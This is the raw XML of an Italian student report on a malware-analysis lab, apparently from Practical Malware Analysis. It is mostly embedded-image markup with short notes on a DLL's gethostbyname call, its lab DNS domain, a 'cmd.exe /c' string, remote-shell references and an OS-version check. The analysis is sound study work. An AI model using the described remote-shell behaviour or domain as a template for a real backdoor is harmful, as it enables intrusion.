            <wp:extent cx="6645910" cy="1055370"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1751648337" name="Immagine 2"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8337" name="Immagine 2" descr="Immagine che contiene testo, Carattere, numero, linea&#10;&#10;Descrizione generata automaticamente"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId207"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6645910" cy="1055370"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0792E26C" w14:textId="3E47F925" w:rsidR="00DA6AE1" w:rsidRDefault="00DA6AE1" w:rsidP="00AC2497">
      <w:pPr>
        <w:divId w:val="1276979458"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6A2DE5BE" wp14:editId="65BCF2AD">
            <wp:extent cx="6645910" cy="2078355"/>
            <wp:effectExtent l="0" t="0" r="0" b="4445"/>
            <wp:docPr id="1629727834" name="Immagine 3"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7834" name="Immagine 3" descr="Immagine che contiene testo, schermata, Carattere, software&#10;&#10;Descrizione generata automaticamente"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId208"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6645910" cy="2078355"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="397883B6" w14:textId="7BFBE831" w:rsidR="00DC373A" w:rsidRDefault="00DC373A" w:rsidP="00AC2497">
      <w:pPr>
        <w:divId w:val="1276979458"/>
      </w:pPr>
      <w:r>
        <w:t>Gethostbyna,e è situato in 100163CC</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E0B80B8" w14:textId="73BF276F" w:rsidR="00DC373A" w:rsidRDefault="00D773C6" w:rsidP="00AC2497">
      <w:pPr>
        <w:divId w:val="1276979458"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0758B9F9" wp14:editId="157EC640">
            <wp:extent cx="6645910" cy="3531235"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1605984704" name="Immagine 4"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4704" name="Immagine 4" descr="Immagine che contiene testo, software, Icona del computer, Software multimediale&#10;&#10;Descrizione generata automaticamente"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId209"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6645910" cy="3531235"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="73CFAAEC" w14:textId="47FE150F" w:rsidR="00D773C6" w:rsidRDefault="00287C06" w:rsidP="00AC2497">
      <w:pPr>
        <w:divId w:val="1276979458"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Ci </w:t>
      </w:r>
      <w:r w:rsidR="00E44DE1">
        <w:t>sono 9 di tipologia p su 18 totali</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77295972" w14:textId="77777777" w:rsidR="00E44DE1" w:rsidRDefault="00E44DE1" w:rsidP="00AC2497">
      <w:pPr>
        <w:divId w:val="1276979458"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6670A2C5" w14:textId="4BC92B05" w:rsidR="00E44DE1" w:rsidRDefault="00587E1C" w:rsidP="00AC2497">
      <w:pPr>
        <w:divId w:val="1276979458"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7F842C4A" wp14:editId="1250C54C">
            <wp:extent cx="6645910" cy="1390015"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="130366414" name="Immagine 5"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414" name="Immagine 5" descr="Immagine che contiene testo, software, schermata, Pagina Web&#10;&#10;Descrizione generata automaticamente"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId210"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6645910" cy="1390015"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="07F2F92E" w14:textId="0F5457A6" w:rsidR="00587E1C" w:rsidRDefault="00587E1C" w:rsidP="00AC2497">
      <w:pPr>
        <w:divId w:val="1276979458"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7976052C" w14:textId="69AB5223" w:rsidR="00CA38B4" w:rsidRDefault="00CA38B4" w:rsidP="00AC2497">
      <w:pPr>
        <w:divId w:val="1276979458"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6C7AEA45" wp14:editId="38753608">
            <wp:extent cx="6645910" cy="1690370"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1098375681"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75681" name="Immagine 6" descr="Immagine che contiene testo, schermata, Carattere&#10;&#10;Descrizione generata automaticamente"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId211"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6645910" cy="1690370"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CA36B0B" w14:textId="77777777" w:rsidR="00CA38B4" w:rsidRDefault="00CA38B4" w:rsidP="00AC2497">
      <w:pPr>
        <w:divId w:val="1276979458"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="42D717AA" w14:textId="77777777" w:rsidR="000138C7" w:rsidRDefault="000138C7" w:rsidP="00AC2497">
      <w:pPr>
        <w:divId w:val="1276979458"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7D4CA6E4" w14:textId="350F3FC9" w:rsidR="000138C7" w:rsidRDefault="000138C7" w:rsidP="00AC2497">
      <w:pPr>
        <w:divId w:val="1276979458"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="250EDDF5" wp14:editId="4C4A610E">
            <wp:extent cx="6645910" cy="965200"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="147097602" name="Immagine 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602" name="Immagine 7" descr="Immagine che contiene testo, schermata, Carattere, linea&#10;&#10;Descrizione generata automaticamente"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId212"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6645910" cy="965200"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="59B8044C" w14:textId="0389CC20" w:rsidR="000138C7" w:rsidRDefault="000138C7" w:rsidP="00AC2497">
      <w:pPr>
        <w:divId w:val="1276979458"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">La richiesta DNS è </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA38B4">
        <w:t>[This is RDO]pics.praticalmalwareanalysis.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42AB083E" w14:textId="77777777" w:rsidR="000138C7" w:rsidRDefault="000138C7" w:rsidP="00AC2497">
      <w:pPr>
        <w:divId w:val="1276979458"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="51AEF1F2" w14:textId="5486F5C6" w:rsidR="000138C7" w:rsidRDefault="000138C7" w:rsidP="00AC2497">
      <w:pPr>
        <w:divId w:val="1276979458"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="588F9B13" wp14:editId="641E959A">
            <wp:extent cx="6645910" cy="6000750"/>
            <wp:effectExtent l="0" t="0" r="0" b="6350"/>
            <wp:docPr id="930194579" name="Immagine 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4579" name="Immagine 8" descr="Immagine che contiene testo, schermata, schermo, numero&#10;&#10;Descrizione generata automaticamente"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId213"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6645910" cy="6000750"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0624B4E6" w14:textId="4E71346D" w:rsidR="00C34BD4" w:rsidRDefault="00C34BD4">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EB4D6ED" w14:textId="65163F80" w:rsidR="00CD260C" w:rsidRDefault="00CD260C" w:rsidP="00AC2497">
      <w:pPr>
        <w:divId w:val="1276979458"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6E1792D3" wp14:editId="56820A87">
            <wp:extent cx="6645910" cy="1997710"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="732311971" name="Immagine 9"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1971" name="Immagine 9" descr="Immagine che contiene testo, schermata, Carattere, design&#10;&#10;Descrizione generata automaticamente"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId214"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6645910" cy="1997710"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B780BD4" w14:textId="77777777" w:rsidR="00CD260C" w:rsidRDefault="00CD260C" w:rsidP="00CD260C">
      <w:pPr>
        <w:divId w:val="1276979458"/>
      </w:pPr>
      <w:r>
        <w:t>La parola coperta è pics.praticalmalwareanalysis[.]com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D128B54" w14:textId="77777777" w:rsidR="00CD260C" w:rsidRDefault="00CD260C" w:rsidP="00AC2497">
      <w:pPr>
        <w:divId w:val="1276979458"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="07F1E037" w14:textId="1B6FCF6D" w:rsidR="00CD260C" w:rsidRDefault="009927AA" w:rsidP="00AC2497">
      <w:pPr>
        <w:divId w:val="1276979458"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2B7552B4" wp14:editId="1215DD36">
            <wp:extent cx="6645910" cy="4216400"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1699638051"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8051" name="Immagine 10" descr="Immagine che contiene testo, schermata&#10;&#10;Descrizione generata automaticamente"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId215"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6645910" cy="4216400"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="418F7457" w14:textId="33F4EA08" w:rsidR="009927AA" w:rsidRDefault="00747C59" w:rsidP="00AC2497">
      <w:pPr>
        <w:divId w:val="1276979458"/>
      </w:pPr>
      <w:r>
        <w:t>Vi è un parametro di ingresso LP</w:t>
      </w:r>
      <w:r w:rsidR="00EC7769">
        <w:t>VOID lpThreadParameter</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="368F8D44" w14:textId="0A6A66B2" w:rsidR="00EC7769" w:rsidRDefault="00EC7769" w:rsidP="00AC2497">
      <w:pPr>
        <w:divId w:val="1276979458"/>
      </w:pPr>
      <w:r>
        <w:t>Vi sono 2</w:t>
      </w:r>
      <w:r w:rsidR="004E447E">
        <w:t>4 variabili</w:t>
      </w:r>
      <w:r w:rsidR="006C4123">
        <w:t xml:space="preserve"> locali</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23DFFF1E" w14:textId="634ADEAA" w:rsidR="006C4123" w:rsidRDefault="006C4123">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A4D0583" w14:textId="371E6747" w:rsidR="006C4123" w:rsidRDefault="006C4123" w:rsidP="00AC2497">
      <w:pPr>
        <w:divId w:val="1276979458"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="246CF1C6" wp14:editId="1BB59263">
            <wp:extent cx="6644315" cy="1137359"/>
            <wp:effectExtent l="0" t="0" r="0" b="5715"/>
            <wp:docPr id="1347333575" name="Immagine 11"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3575" name="Immagine 11" descr="Immagine che contiene testo, software, schermata, Icona del computer&#10;&#10;Descrizione generata automaticamente"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1">
                    <a:blip r:embed="rId216"/>
                    <a:srcRect t="9460" b="39946"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6645910" cy="1137632"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4707A523" w14:textId="1EE0236A" w:rsidR="00E1464F" w:rsidRDefault="00D455FE" w:rsidP="00AC2497">
      <w:pPr>
        <w:divId w:val="1276979458"/>
      </w:pPr>
      <w:r>
        <w:t>Abbiamo trovato la stringa \\cmd.exe /c</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08AD43E7" w14:textId="52BB1589" w:rsidR="00D455FE" w:rsidRDefault="00D455FE" w:rsidP="00AC2497">
      <w:pPr>
        <w:divId w:val="1276979458"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6E3606A7" wp14:editId="3D117297">
            <wp:extent cx="6620624" cy="2966484"/>
            <wp:effectExtent l="0" t="0" r="0" b="5715"/>
            <wp:docPr id="1516033637" name="Immagine 12" descr="Immagine che contiene testo, schermata, line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3637" name="Immagine 12" descr="Immagine che contiene testo, schermata, linea, software&#10;&#10;Descrizione generata automaticamente"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1">
                    <a:blip r:embed="rId217"/>
                    <a:srcRect l="14841" t="12822" r="3064"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6650141" cy="2979710"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C14BD13" w14:textId="6D83FD35" w:rsidR="00D455FE" w:rsidRDefault="009B496F" w:rsidP="00AC2497">
      <w:pPr>
        <w:divId w:val="1276979458"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7B95D6C8" wp14:editId="562C3A4D">
            <wp:extent cx="6620510" cy="3271585"/>
            <wp:effectExtent l="0" t="0" r="0" b="5080"/>
            <wp:docPr id="1434321252" name="Immagine 1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1252" name="Immagine 13" descr="Immagine che contiene testo, schermata, Carattere&#10;&#10;Descrizione generata automaticamente"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1">
                    <a:blip r:embed="rId218"/>
                    <a:srcRect l="1600" r="17443" b="2808"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6642997" cy="3282697"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B5BCF29" w14:textId="774A03D7" w:rsidR="00E349AE" w:rsidRDefault="00051721" w:rsidP="00AC2497">
      <w:pPr>
        <w:divId w:val="1276979458"/>
      </w:pPr>
      <w:r w:rsidRPr="00051721">
        <w:t xml:space="preserve">possiamo vedere </w:t>
      </w:r>
      <w:r w:rsidR="00103DBF">
        <w:t>riferimenti</w:t>
      </w:r>
      <w:r w:rsidRPr="00051721">
        <w:t xml:space="preserve"> come: idle, uptime, mmodule, minstall e inject all catch out eyes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65285F77" w14:textId="02B275E4" w:rsidR="006E3841" w:rsidRDefault="00650587" w:rsidP="00AC2497">
      <w:pPr>
        <w:divId w:val="1276979458"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Vi sono inoltre delle stringhe </w:t>
      </w:r>
      <w:r w:rsidR="009B10E5">
        <w:t xml:space="preserve">che fanno riferimento a “questa sessione di shell remota” e quindi </w:t>
      </w:r>
      <w:r w:rsidR="002E4A0F">
        <w:t>si presuppone faccia riferimento alla remote shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BCB2B68" w14:textId="207AF4C6" w:rsidR="002E4A0F" w:rsidRDefault="00103DBF" w:rsidP="00AC2497">
      <w:pPr>
        <w:divId w:val="1276979458"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="17F6269D" wp14:editId="3A718B28">
            <wp:extent cx="6645910" cy="2014855"/>
            <wp:effectExtent l="0" t="0" r="0" b="4445"/>
            <wp:docPr id="883712998" name="Immagine 14"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2998" name="Immagine 14" descr="Immagine che contiene testo, schermata, Carattere, software&#10;&#10;Descrizione generata automaticamente"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId219"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6645910" cy="2014855"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidR="00763B3D">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="280D1E3B" wp14:editId="35401CB5">
            <wp:extent cx="6645910" cy="2257425"/>
            <wp:effectExtent l="0" t="0" r="0" b="3175"/>
            <wp:docPr id="936823220" name="Immagine 15" descr="Immagine che contiene testo, software,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3220" name="Immagine 15" descr="Immagine che contiene testo, software, numero, Carattere&#10;&#10;Descrizione generata automaticamente"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId220"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6645910" cy="2257425"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BE994B2" w14:textId="64BEA11F" w:rsidR="00763B3D" w:rsidRDefault="002E02DE" w:rsidP="00AC2497">
      <w:pPr>
        <w:divId w:val="1276979458"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="003803AC" wp14:editId="62C32AF9">
            <wp:extent cx="6645910" cy="2008505"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="952615541" name="Immagine 16"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5541" name="Immagine 16" descr="Immagine che contiene testo, schermata, software, numero&#10;&#10;Descrizione generata automaticamente"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId221"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6645910" cy="2008505"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="70548BFC" w14:textId="2EB92EB4" w:rsidR="00443869" w:rsidRDefault="00443869" w:rsidP="00443869">
      <w:pPr>
        <w:divId w:val="1276979458"/>
      </w:pPr>
      <w:r>
        <w:t>Partendo dallo specifico indirizzo 0x100101C8, possiamo osservare un'istruzione di confronto che effettua un confronto tra ebx e dword_1008E5C4. Attraverso l'analisi dei riferimenti interconnessi, è possibile individuare un riferimento che contiene effettivamente l'istruzione mov al fine di stabilire il valore.In seguito, l'output di sub_10003695 sarà trasferito direttamente a dword_1008E5C4.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E2A1479" w14:textId="775AC56B" w:rsidR="00156F22" w:rsidRDefault="00156F22" w:rsidP="00443869">
      <w:pPr>
        <w:divId w:val="1276979458"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="00351F02" wp14:editId="76C4D0F0">
            <wp:extent cx="6335236" cy="1998921"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="1764461270" name="Immagine 17"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1270" name="Immagine 17" descr="Immagine che contiene testo, Carattere, schermata&#10;&#10;Descrizione generata automaticamente"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1">
                    <a:blip r:embed="rId222"/>
                    <a:srcRect r="10248" b="26854"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6362510" cy="2007526"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EF75573" w14:textId="7BB23929" w:rsidR="00156F22" w:rsidRDefault="00156F22" w:rsidP="00AC2497">
      <w:pPr>
        <w:divId w:val="1276979458"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7F47D3E0" wp14:editId="4615EAA7">
            <wp:extent cx="4876800" cy="190500"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="34554873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8736" name="Immagine 345548736"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId223"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4876800" cy="190500"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ACC31A0" w14:textId="0EE94EE4" w:rsidR="00A74C7A" w:rsidRDefault="00A74C7A" w:rsidP="00AC2497">
      <w:pPr>
        <w:divId w:val="1276979458"/>
      </w:pPr>
      <w:r>
        <w:t>I</w:t>
      </w:r>
      <w:r w:rsidRPr="00A74C7A">
        <w:t>l malware prenderà un percorso diverso a seconda che il sistema operativo sia Windows NT o successivo.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3408B697" w14:textId="77777777" w:rsidR="00FF1CD1" w:rsidRDefault="00FF1CD1" w:rsidP="00AC2497">
      <w:pPr>
        <w:divId w:val="1276979458"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1AFDFCE4" w14:textId="77777777" w:rsidR="0097355D" w:rsidRDefault="00FF1CD1" w:rsidP="00FF1CD1">
      <w:pPr>
        <w:pStyle w:val="Titolo2"/>
        <w:divId w:val="1276979458"/>
      </w:pPr>
      <w:bookmarkStart w:id="57" w:name="_Toc140165829"/>
      <w:r>
        <w:t>7.2 Extra task</w:t>
      </w:r>
      <w:bookmarkEnd w:id="57"/>
    </w:p>
